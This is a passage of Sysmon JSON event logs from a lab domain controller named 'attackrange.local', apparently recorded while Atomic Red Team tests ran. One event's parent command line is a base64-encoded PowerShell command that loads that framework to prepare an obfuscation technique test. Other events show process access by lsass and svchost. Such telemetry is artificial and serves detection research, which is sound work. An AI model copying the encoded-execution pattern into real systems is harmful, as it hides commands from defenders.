C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:36.890","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"2800","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-0324-5F25-0000-00100DC10700}","TargetProcessId":"4984","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:37","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4911,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:37.253\r\nProcessGuid: {A837DB8D-0325-5F25-0000-0010BCDA0700}\r\nProcessId: 644\r\nImage: C:\\Windows\\System32\\HOSTNAME.EXE\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Hostname APP\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: hostname.exe\r\nCommandLine: \"C:\\Windows\\system32\\HOSTNAME.EXE\"\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {A837DB8D-0323-5F25-0000-0020A2950700}\r\nLogonId: 0x795A2\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=1088BA1BF7CDDFF61ECC51BC0C02FDEF,SHA256=B8DA5A3AE4371E63DFD2F468E29CC23AA6F98A6A357A67955996F8F61E58FBA1,IMPHASH=D210D728CB9D45B4D1827BCE52F7EC6E\r\nParentProcessGuid: {A837DB8D-0324-5F25-0000-00100DC10700}\r\nParentProcessId: 4984\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADIANwAiACAALQBHAGUAdABQAHIAZQByAGUAcQBzAA==","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:37.253","ProcessGuid":"{A837DB8D-0325-5F25-0000-0010BCDA0700}","Image":"C:\\Windows\\System32\\HOSTNAME.EXE","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Hostname APP","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"hostname.exe","CommandLine":"\"C:\\Windows\\system32\\HOSTNAME.EXE\"","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{A837DB8D-0323-5F25-0000-0020A2950700}","LogonId":"0x795a2","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=1088BA1BF7CDDFF61ECC51BC0C02FDEF,SHA256=B8DA5A3AE4371E63DFD2F468E29CC23AA6F98A6A357A67955996F8F61E58FBA1,IMPHASH=D210D728CB9D45B4D1827BCE52F7EC6E","ParentProcessGuid":"{A837DB8D-0324-5F25-0000-00100DC10700}","ParentProcessId":"4984","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADIANwAiACAALQBHAGUAdABQAHIAZQByAGUAcQBzAA==","EventReceivedTime":"2020-08-01 05:52:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:37","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4912,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:37.249\r\nSourceProcessGUID: {A837DB8D-0324-5F25-0000-00100DC10700}\r\nSourceProcessId: 4984\r\nSourceThreadId: 4316\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {A837DB8D-0325-5F25-0000-0010BCDA0700}\r\nTargetProcessId: 644\r\nTargetImage: C:\\Windows\\system32\\HOSTNAME.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+982a2ee2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97743fbc(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97743c8d(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+981f50a2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97704823(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97762cf2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97746357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97746357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97746357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+977461e8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+9773816d(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+977446a0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+9774423c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97743fbc(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97743c8d(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+981f50a2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97704823(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:37.249","SourceProcessGUID":"{A837DB8D-0324-5F25-0000-00100DC10700}","SourceProcessId":"4984","SourceThreadId":"4316","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{A837DB8D-0325-5F25-0000-0010BCDA0700}","TargetProcessId":"644","TargetImage":"C:\\Windows\\system32\\HOSTNAME.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+982a2ee2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97743fbc(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97743c8d(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+981f50a2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97704823(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97762cf2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97746357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97746357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97746357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+977461e8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+9773816d(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+977446a0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+9774423c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97743fbc(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97743c8d(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+981f50a2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97704823(wow64)","EventReceivedTime":"2020-08-01 05:52:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:37","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4913,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:37.249\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:37.249","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:37","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4914,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:37.249\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0325-5F25-0000-0010BCDA0700}\r\nTargetProcessId: 644\r\nTargetImage: C:\\Windows\\system32\\HOSTNAME.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:37.249","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0325-5F25-0000-0010BCDA0700}","TargetProcessId":"644","TargetImage":"C:\\Windows\\system32\\HOSTNAME.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:52:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:37","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4915,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:37.249\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:37.249","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:37","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4916,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:37.249\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:37.249","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480